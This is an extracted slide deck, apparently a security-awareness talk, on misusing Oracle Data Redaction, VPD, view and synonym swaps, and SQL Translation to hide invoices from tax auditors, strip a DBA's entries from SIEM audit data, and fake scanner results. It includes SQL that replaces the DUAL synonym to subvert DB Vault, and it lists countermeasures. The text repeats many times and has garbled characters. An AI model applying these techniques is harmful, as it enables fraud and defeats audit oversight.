Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
